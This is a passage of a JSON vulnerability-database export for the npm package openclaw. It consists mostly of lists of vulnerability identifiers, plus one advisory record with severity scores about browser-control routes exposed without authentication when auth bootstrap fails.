mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerabi
lity":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qahm-7zt5-fqcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerabi
lity":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wfsp-szhr-r7eu"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerabi
lity":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zda4-uuw4-fkhp"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"},{"vulnerability":"VCID-zwzb-t4a7-tff8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.1"}],"aliases":["CVE-2026-31999","GHSA-6f6j-wx9w-ff4j"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9nq6-ujfu-4ycx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50468?format=json","vulnerability_id":"VCID-a54z-trcv-p3b8","summary":"OpenClaw: Browser control startup could continue unauthenticated after auth bootstrap failure\nWhen browser control started without explicit auth credentials, OpenClaw attempted to bootstrap auth automatically. 
In affected versions, if that bootstrap step threw an error, startup could continue and expose browser-control routes without authentication.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32041","reference_id":"","reference_type":"","scores":[{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.06538","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.06549","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.0655","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32041"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"},{"value":"7.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unauthenticated-browser-control-access-via-failed-auth-bootstrap","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"},{"value":"7.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-20T17:51:39Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-unauthenticated-browser-control-access-via-failed-auth-bootstrap"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32041","reference_id":"CVE-2026-32041","reference_type":"","scores":[{"val
ue":"6.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"},{"value":"7.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32041"},{"reference_url":"https://github.com/advisories/GHSA-vpj2-69hf-rppw","reference_id":"GHSA-vpj2-69hf-rppw","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vpj2-69hf-rppw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vpj2-69hf-rppw","reference_id":"GHSA-vpj2-69hf-rppw","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-20T17:51:39Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vpj2-69hf-rppw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74372?format=json","purl":"pkg:npm/openclaw@2026.3.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},
{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-34hg-6fw2-wfax"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-49b4-qwz6-q7he"},{"vulnerability":"VCID-4hcw-cv74-zkah"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},
{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7pqs-17nm-duf1"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8u6d-ekbs-afgd"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},
{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-dzmz-c5en-5qeq"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e31s-2etq-6fdq"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fjfw-xwxw-u3at"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},
{"vulnerability":"VCID-h3yu-7bfc-vqhz"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtjv-j6yj-93et"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},
{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qahm-7zt5-fqcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},
{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wfsp-szhr-r7eu"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},
